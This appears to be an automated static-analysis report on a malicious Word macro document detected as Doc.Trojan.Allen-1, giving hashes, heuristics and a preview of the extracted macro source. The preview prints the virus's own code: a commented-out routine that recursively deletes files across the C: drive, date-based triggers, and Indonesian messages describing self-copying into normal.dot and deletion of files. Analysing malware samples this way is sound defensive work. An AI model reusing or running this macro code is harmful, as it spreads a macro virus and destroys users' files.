Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 23de53890ce5c006…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 48.0 KB
Created: 1998-04-01 08:09:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 81d82c02f5456e75956849552343bd13
SHA-1: bfedb8cef4056e21cc211e8ea82f9cdfc3054003
SHA-256: 23de53890ce5c006510a144ec7ec63dbb4acf4614be2f69efd65fe2dc09753d7
Risk score: 220

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains legacy WordBasic macro markers and a large VBA macro, indicating a malicious document. The ClamAV detection 'Doc.Trojan.Allen-1' strongly suggests a known malware family. The macro code, though truncated, contains logic for deleting files across the C:\ drive, including within the Windows and Winword directories, suggesting destructive intent.

Heuristics 4

  • ClamAV: Doc.Trojan.Allen-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Allen-1
  • Legacy WordBasic macro-virus markers (severity: high; rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen together with ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 27271 bytes
SHA-256: 2a0cfef04e97cf3f680cfa2bf0d69b754233f2f6b137fa462699ca7fda76671a
Detection: ClamAV: Doc.Trojan.Allen-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "RpAE"

Public Sub MAIN()
Dim pukul$
Dim hari
Dim tgl
Dim bulan
Dim tahun
Dim hari_$
Dim bulan_$
Dim tgl_$
Dim tahun_$
Dim Semua$
Dim Bacalah$
'tgl = Day(Now())
'jam = Hour(Now())
'If tgl < 20 Then Goto Selamat
'If jam < 11 Then Goto Selamat
'Dim Sehat$(20)
'Dim Subur$(20)
'ChDir "C:\"
'Dim subdirs$(CountDirectories())
'subdirs$(0) = "[..]"
'For i = 1 To CountDirectories()
'   Print "Reading menu...Please wait !"
'   Subdirs$(i) = UCase$(GetDirectory$(i))
'   If Subdirs$(i) = "WINDOWS" Then Goto lewat
'   If Subdirs$(i) = "WINWORD" Then Goto lewat
'   If Subdirs$(i) = "WINWORD6" Then Goto lewat
'   Ojek$ = "C:\" + Subdirs$(i) + "\*.*"
'   Kill ojek$
'   ChDir  Subdirs$(i)
'       Subur$(0) = "[..]"
'       For a = 1 To CountDirectories()
'           Print "Reading menu...Please wait !"
'           subur$(a) = UCase$(GetDirectory$(a))
'           If subur$(a) = "WINWORD" Then Goto pass
'           If subur$(a) = " WINWORD6" Then Goto pass
'           Penyakit$ = "C:\" + subdirs$(i) + "\" + subur$(a) + "\*.*"
'           Kill Penyakit$
'   ChDir subur$(a)
'       sehat$(0) = "[..]"
'               For b = 1 To CountDirectories()
'               Print "Reading menu...Please wait !"
'               sehat$(b) = UCase$(GetDirectory$(b))
'               Tien$ = "C:\" + Subdirs$(i) + "\" + Subur$(a) + "\" + 'Sehat$(b) + "\*.*"
'           Kill Tien$
'           Next b
'           ChDir "C:\" + subdirs$(i)
'PASS:
'       Next a
'       ChDir "C:\"
'lewat:
'Next i
pukul$ = WordBasic.[Time$](WordBasic.Now())
hari = WordBasic.WeekDay(WordBasic.Now())
tgl = WordBasic.Day(WordBasic.Now())
bulan = WordBasic.Month(WordBasic.Now())
tahun = WordBasic.Year(WordBasic.Now())
ReDim hari___$(7)
ReDim bulan___$(12)
If hari = 1 Then hari_$ = "Minggu"
If hari = 2 Then hari_$ = "Senin"
If hari = 3 Then hari_$ = "Selasa"
If hari = 4 Then hari_$ = "Rabu"
If hari = 5 Then hari_$ = "Kamis"
If hari = 6 Then hari_$ = "Jumat"
If hari = 7 Then hari_$ = "Sabtu"
If bulan = 1 Then bulan_$ = "Januari"
If bulan = 2 Then bulan_$ = "Februari"
If bulan = 3 Then bulan_$ = "Maret"
If bulan = 4 Then bulan_$ = "April"
If bulan = 5 Then bulan_$ = "Mei"
If bulan = 6 Then bulan_$ = "Juni"
If bulan = 7 Then bulan_$ = "Juli"
If bulan = 8 Then bulan_$ = "Agustus"
If bulan = 9 Then bulan_$ = "September"
If bulan = 10 Then bulan_$ = "Oktober"
If bulan = 11 Then bulan_$ = "November"
If bulan = 12 Then bulan_$ = "Desember"
tgl_$ = Str(tgl)
tahun_$ = Str(tahun)
Semua$ = hari_$ + ", " + tgl_$ + " " + bulan_$ + " " + tahun_$ + ", Jam :" + pukul$ + "."
'Pesan$ = "Anda rupanya sedang sial, semua file di mesin ini kecuali yang berada di direktori WINDOWS dan WINWORD telah hilang, jangan kaget, ini bukan ulah Anda, tapi ini hasil pekerjaan saya...Barang siapa yang berhasil menemukan cara menangkal virus ini
', saya aka" + "n memberi listing virus ini untuk Anda !!! Dan tentu saja saya akan terus datang kesini untuk memberi Anda salam dengan virus-virus terbaru dari saya...selamat !   Bandung, " + semua$
Bacalah$ = "Assalamualaikum ..., maaf @Rapi.Kom mengganggu anda sebentar. Pesan ini aslinya bernama  PESAN.TXT  yang  muncul  di  root direktori  setelah  anda menjalankan Winword 6.0 yang templatenya (normal.dot)  telah  tertulari  macro  menjijikkan ini. Macro ini " + "(sebe" + "lum @R" + "a" + "pi" + ".Kom modifikasi)  berasal  dari  file data Winword 6.0 (*.doc) yang telah tertular macro ini. Bila file data tersebut  di pangggil (Open doc), maka macro secara otomatis menjalankan perintah-perintah macro lain nya,  yang antara  lain mengcopykan  diri ke" + " gl" + "o" + "bal " + "template (normal.dot), juga pada tanggal dan jam tertentu akan menghapus semua data di direktori tingkat 1, 2 dan 3 (kecuali Hidden direkto
... (truncated)